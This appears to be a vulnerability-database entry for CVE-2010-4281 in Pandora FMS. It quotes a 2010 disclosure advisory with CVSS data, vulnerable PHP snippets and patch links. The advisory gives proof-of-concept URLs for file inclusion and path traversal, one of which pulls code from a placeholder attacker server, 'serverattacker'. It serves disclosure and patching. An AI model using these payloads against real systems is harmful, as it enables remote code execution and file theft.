Vulnerabilities > CVE-2010-4281 - Code Injection vulnerability in Artica Pandora FMS

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
artica
CWE-94
exploit available
NVD
Published: 2010-12-02
Updated: 2018-10-10

Summary

Incomplete blacklist vulnerability in the safe_url_extraclean function in ajax.php in Pandora FMS before 3.1.1 allows remote attackers to execute arbitrary PHP code by using a page parameter containing a UNC share pathname, which bypasses the check for the : (colon) character.

Vulnerable Configurations

Part Description Count
Application
Artica
20

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Leverage Executable Code in Non-Executable Files
    An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
  • Manipulating User-Controlled Variables
    This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An attacker can override environment variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.

Exploit-Db

descriptionPandora Fms <= 3.1 Path Traversal and LFI. CVE-2010-4281,CVE-2010-4282,CVE-2010-4283. Webapps exploit for php platform
fileexploits/php/webapps/15643.txt
idEDB-ID:15643
last seen2016-02-01
modified2010-11-30
platformphp
port
published2010-11-30
reporterJuan Galiana Lara
sourcehttps://www.exploit-db.com/download/15643/
titlePandora Fms <= 3.1 Path Traversal and LFI
typewebapps

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/96259/pandorafms-sqltraversal.txt
idPACKETSTORM:96259
last seen2016-12-05
published2010-12-01
reporterJuan Galiana Lara
sourcehttps://packetstormsecurity.com/files/96259/Pandora-FMS-Command-Injection-SQL-Injection-Path-Traversal.html
titlePandora FMS Command Injection / SQL Injection / Path Traversal

Seebug

bulletinFamilyexploit
description[+] Introduction Pandora FMS (for Pandora Flexible Monitoring System) is a software solution for monitoring computer networks. It allows monitoring in a visual way the status and performance of several parameters from different operating systems, servers, applications and hardware systems such as firewalls, proxies, databases, web servers or routers. It can be deployed in almost any operating system. It features remote monitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use agents. An agent is available for each platform. It can also monitor hardware systems with a TCP/IP stack, such as load balancers, routers, network switches, printers or firewalls. This software has several servers that process and get information from different sources, using WMI for gathering remote Windows information, a predictive server, a plug-in server which makes complex user-defined network tests, an advanced export server to replicate data between different sites of Pandora FMS, a network discovery server, and an SNMP Trap console. Released under the terms of the GNU General Public License, Pandora FMS is free software. 5) Path Traversal: 5.1 - PHP File Inclusion (or RFI/LFI: Remote/Local file inclusion) - CVE-2010-4281 -CVE-2010-4282 - CVSS 8.5/10 Parameter 'page' of ajax.php is not properly sanitizing user-supplied input. The function safe_url_extraclean is filtering ':' character, and it doesn't allow to use the string "http://"; to create urls, but allows '/' character and an attacker could reference remote resources via Windows UNC files, using //servername//resource/file Note that the first check in safe_url_extraclean is filtering '://', so we can bypass the filter easily doing http://http://url, and it only strip the first protocol://. However, the last preg_replace strips the : character. Proof of concept: UNC: http://servername/pandora_console/ajax.php?page=//server/share/test As well, ajax.php allows to include any php file in the disk filesystem: http://servername/pandora_console/ajax.php?page=../../../../../directory/file Character %00 is not allowed due safe_url_extraclean function filtering, and is not possible to include other files distinct that php files, but still allows . and / characters. 5.2 - PHP File Inclusion (or RFI Remote file inclusion) - CVE-2010-4283 - - CVSS 7.9/10 An attacker can inject arbitrary PHP code and execute it remotely due argv[1] parameter is not filtered in file pandora_diag.php. PoC: http://servername/pandora_console/extras/pandora_diag.php?argc=2&argv[1]=http://serverattacker/salsa.php%00 Note: that issue needs register_globals set to On to be exploitable. 5.3 - Path traversal & Local file inclusion vulnerabilities - CVE-2010-4282 - CVSS 6.8/10 An attacker can include arbitrary files of the filesystem via id parameter in file pandora_help.php. Snippet of vulnerable code: 24 $id = get_parameter ('id'); 25 26 /* Possible file locations */ 27 $files = array ($config["homedir"]."/include/help/".$config["language"]."/help_".$id.".php", 28 $config["homedir"].ENTERPRISE_DIR."/include/help/".$config["language"]."/help_".$id.".php", 29 $config["homedir"].ENTERPRISE_DIR."/include/help/en/help_".$id.".php", 30 $config["homedir"]."/include/help/en/help_".$id.".php"); 31 $help_file = ''; 32 foreach ($files as $file) { 33 if (file_exists ($file)) { 34 $help_file = $file; 35 break; 36 } 37 } ... 62 require_once ($help_file); Proof of concept: http://servername/pandora_console/general/pandora_help.php?id=/../../../../../../../boot.ini%00 This code is platform dependent bug, you can read more at http://seclists.org/fulldisclosure/2010/Jul/137 Only works in windows systems, an attacker can include local file using ../ characters due parameter id is not filtered If magic_quotes_gpc is Off, arbitrary files can be included, like boot.ini using NULL character (%00), if not, only php files are allowed 5.4 - Path traversal & Arbitrary write and delete files - CVE-2010-4282 - - CVSS 8.0/10 In file operation/agentes/networkmap.php the 'layout' parameter is handled in an insecure way and it is used to write and delete files on the filesystem. An attacker could use this parameter to write in arbitrary paths and even remove files. Snippet of vulnerable code: 32 $layout = (string) get_parameter ('layout', 'radial'); ... 137 $filename_map = $config["attachment_store"]."/networkmap_".$layout; 138 $filename_img = "attachment/networkmap_".$layout."_".$font_size; 139 $filename_dot = $config["attachment_store"]."/networkmap_".$layout; ... 157 $fh = @fopen ($filename_dot, 'w'); 158 if ($fh === false) { 159 $result = false; 160 } else { 161 fwrite ($fh, $graph); 162 $cmd = "$filter -Tcmapx -o".$filename_map." -Tpng - -o".$filename_img." ".$filename_dot; 163 $result = system ($cmd); 164 fclose ($fh); 165 unlink ($filename_dot); 166 } ... 178 require ($filename_map); Character sequences '../' could be used to write files (due -o parameter in lines 162 and 163), as well as potentially remove files (line 157, 161 and 165) or include them (line 178) As well like in 5.3 this issue is only exploitable in windows environments because the same reason. [+] Impact An attacker can execute commands of the operating system, inject remote code in the context of the application, get arbitrary files from the filesystem or extract any data of the database including passwords and confidential information about the monitored network/systems. Also it is possible to bypass the authentication or scale privileges to became admin, gaining full control of the web application and web server. These vulnerabilities have a high impact to the confidentiality, integrity, and availability of the system. [+] Systems affected Versions prior and including 3.1 of Pandora FMS are affected [+] Solution Apply the security fix for version 3.1: http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download Or upgrade to version 3.1.1 from http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/ [+] Timeline Ago 2010: First contact to vendor Ago 2010: Confirmation of vendor Sept 2010: Second contact: SQL Injection vulnerabilities Sept 2010: Confirmation that the fix will be released on October Oct 2010: PandoraFMS security patch for 3.1 version released Oct 2010: Request for CVE numbers Nov 2010: PandoraFMS version 3.1.1 released Nov 2010: Disclosure of this advisory [+] References Official PandoraFMS site: http://pandorafms.org/ SourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/ Wikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS Common Vulnerability Scoring System (CVSS) v2 calculator: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2 Common Vulnerabilities and Exposures (CVE): http://cve.mitre.org/ [+] Credits These vulnerabilities has been discovered by Juan Galiana Lara - @jgaliana - http://juangaliana.blogspot.com/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy YbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s IVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9 WIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4 cC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP JPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP 8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4 7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH pARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5 yNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4 oBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF sn9vRJk4gc/PozOXDjC3 =WmOh -----END PGP SIGNATURE-----
idSSV:70309
last seen2017-11-19
modified2014-07-01
published2014-07-01
reporterRoot
titlePandora FMS <= 3.1 Path Traversal and LFI

References